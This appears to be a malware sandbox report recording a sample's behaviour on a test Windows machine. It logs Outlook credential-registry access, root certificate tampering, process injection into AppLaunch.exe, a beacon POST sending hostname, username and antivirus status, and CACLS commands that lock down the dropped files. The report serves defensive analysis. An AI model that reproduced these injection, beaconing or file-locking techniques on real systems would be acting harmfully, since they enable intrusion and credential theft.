RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:45 a.m.	key_handle: 0x000003f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:45 a.m.	key_handle: 0x000003f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:45 a.m.	key_handle: 0x000003f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:45 a.m.	key_handle: 0x000003f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:45 a.m.	key_handle: 0x000003f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:45 a.m.	key_handle: 0x000003f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:45 a.m.	key_handle: 0x000003f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:45 a.m.	key_handle: 0x000003f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:45 a.m.	key_handle: 0x000003f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:45 a.m.	key_handle: 0x000003f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:45 a.m.	key_handle: 0x000003f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:45 a.m.	key_handle: 0x000003f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1

Harvests credentials from local email clients (1 event)

registry

HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (3 events)

process	AppLaunch.exe	useragent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
process	explothe.exe	useragent
process	iexplore.exe	useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (12 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2276 called NtSetContextThread to modify thread in remote process 2344
Process injection	Process 2808 called NtSetContextThread to modify thread in remote process 1700
Process injection	Process 1532 called NtSetContextThread to modify thread in remote process 3060
Process injection	Process 3196 called NtSetContextThread to modify thread in remote process 3668
Process injection	Process 3520 called NtSetContextThread to modify thread in remote process 3832
Process injection	Process 3320 called NtSetContextThread to modify thread in remote process 3992
NtSetContextThread Oct. 16, 2023, 9:44 a.m.	registers.eip: 2005598660 registers.esp: 3800852 registers.edi: 0 registers.eax: 4198977 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000020 process_identifier: 2344	1	0	0
NtSetContextThread Oct. 16, 2023, 9:44 a.m.	registers.eip: 2005598660 registers.esp: 3210104 registers.edi: 0 registers.eax: 4384238 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000020 process_identifier: 1700	1	0	0
NtSetContextThread Oct. 16, 2023, 9:44 a.m.	registers.eip: 2005598660 registers.esp: 4194060 registers.edi: 0 registers.eax: 4207172 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000020 process_identifier: 3060	1	0	0
NtSetContextThread Oct. 16, 2023, 9:44 a.m.	registers.eip: 2005598660 registers.esp: 3799708 registers.edi: 0 registers.eax: 4198977 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000012c process_identifier: 3668	1	0	0
NtSetContextThread Oct. 16, 2023, 9:44 a.m.	registers.eip: 2005598660 registers.esp: 3864748 registers.edi: 0 registers.eax: 4198977 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000020 process_identifier: 3832	1	0	0
NtSetContextThread Oct. 16, 2023, 9:45 a.m.	registers.eip: 2005598660 registers.esp: 1571688 registers.edi: 0 registers.eax: 4384238 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000020 process_identifier: 3992	1	0	0

One or more non-whitelisted processes were created (8 events)

parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x138,0x13c,0x140,0x10c,0x144,0x7fef2b76e00,0x7fef2b76e10,0x7fef2b76e20
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x138,0x13c,0x140,0x10c,0x144,0x7fef2a76e00,0x7fef2a76e10,0x7fef2a76e20
parent_process	powershell.exe	martian_process	iexplore https://accounts.google.com/
parent_process	powershell.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com/
parent_process	powershell.exe	martian_process	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://accounts.google.com/
parent_process	powershell.exe	martian_process	Chrome https://accounts.google.com/
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x138,0x13c,0x140,0x10c,0x144,0x7fef2b76e00,0x7fef2b76e10,0x7fef2b76e20
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x138,0x13c,0x140,0x10c,0x144,0x7fef2a76e00,0x7fef2a76e10,0x7fef2a76e20

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (13 events)

Time & API	Arguments	Status	Return
HttpSendRequestA Oct. 16, 2023, 9:44 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Oct. 16, 2023, 9:44 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Oct. 16, 2023, 9:44 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Oct. 16, 2023, 9:44 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Oct. 16, 2023, 9:44 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Oct. 16, 2023, 9:44 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Oct. 16, 2023, 9:44 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Oct. 16, 2023, 9:44 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Oct. 16, 2023, 9:44 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Oct. 16, 2023, 9:44 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Oct. 16, 2023, 9:44 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Oct. 16, 2023, 9:44 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Oct. 16, 2023, 9:44 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1

Resumed a suspended thread in a remote process potentially indicative of process injection (22 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2276 resumed a thread in remote process 2344
Process injection	Process 2808 resumed a thread in remote process 1700
Process injection	Process 1532 resumed a thread in remote process 3060
Process injection	Process 2940 resumed a thread in remote process 1676
Process injection	Process 2940 resumed a thread in remote process 3792
Process injection	Process 2940 resumed a thread in remote process 3164
Process injection	Process 2948 resumed a thread in remote process 3124
Process injection	Process 3196 resumed a thread in remote process 3668
Process injection	Process 3520 resumed a thread in remote process 3832
Process injection	Process 3320 resumed a thread in remote process 3992
Process injection	Process 3076 resumed a thread in remote process 3928
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x00000020 suspend_count: 1 process_identifier: 2344	1	0	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x00000020 suspend_count: 1 process_identifier: 1700	1	0	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x00000020 suspend_count: 1 process_identifier: 3060	1	0	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x000003b0 suspend_count: 1 process_identifier: 1676	1	0	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x0000072c suspend_count: 1 process_identifier: 3792	1	0	0
NtResumeThread Oct. 16, 2023, 9:45 a.m.	thread_handle: 0x00000798 suspend_count: 1 process_identifier: 3164	1	0	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x0000025c suspend_count: 1 process_identifier: 3124	1	0	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x0000012c suspend_count: 1 process_identifier: 3668	1	0	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x00000020 suspend_count: 1 process_identifier: 3832	1	0	0
NtResumeThread Oct. 16, 2023, 9:45 a.m.	thread_handle: 0x00000020 suspend_count: 1 process_identifier: 3992	1	0	0
NtResumeThread Oct. 16, 2023, 9:45 a.m.	thread_handle: 0x0000025c suspend_count: 1 process_identifier: 3928	1	0	0

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	CACLS "..\fefffe8cea" /P "test22:R" /E
cmdline	cmd /k echo Y\|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y\|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
cmdline	CACLS "explothe.exe" /P "test22:N"
cmdline	CACLS "..\fefffe8cea" /P "test22:N"
cmdline	CACLS "explothe.exe" /P "test22:R" /E
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y\|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit

Executed a process and injected code into it, probably while unpacking (50 out of 253 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2052 thread_handle: 0x0000001c process_identifier: 1720 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\JD9xE6RV.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2964 thread_handle: 0x00000128 process_identifier: 2948 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6lN50pn.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2120 thread_handle: 0x0000001c process_identifier: 2116 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\IQ5MD6nz.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2600 thread_handle: 0x00000128 process_identifier: 2316 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\5um56Yn.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2192 thread_handle: 0x0000001c process_identifier: 2188 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\Ze6Wz5Pk.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2708 thread_handle: 0x00000128 process_identifier: 2808 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\4Dl351Uz.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2236 thread_handle: 0x0000001c process_identifier: 2232 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP003.TMP\YG2en6hu.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2448 thread_handle: 0x00000128 process_identifier: 2480 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP003.TMP\3Ko7QU72.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2280 thread_handle: 0x0000001c process_identifier: 2276 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP004.TMP\1sR42BQ9.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2408 thread_handle: 0x00000128 process_identifier: 2404 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP004.TMP\2Au742WU.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2348 thread_handle: 0x00000020 process_identifier: 2344 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000002c	1	1
NtGetContextThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x00000020	1	0
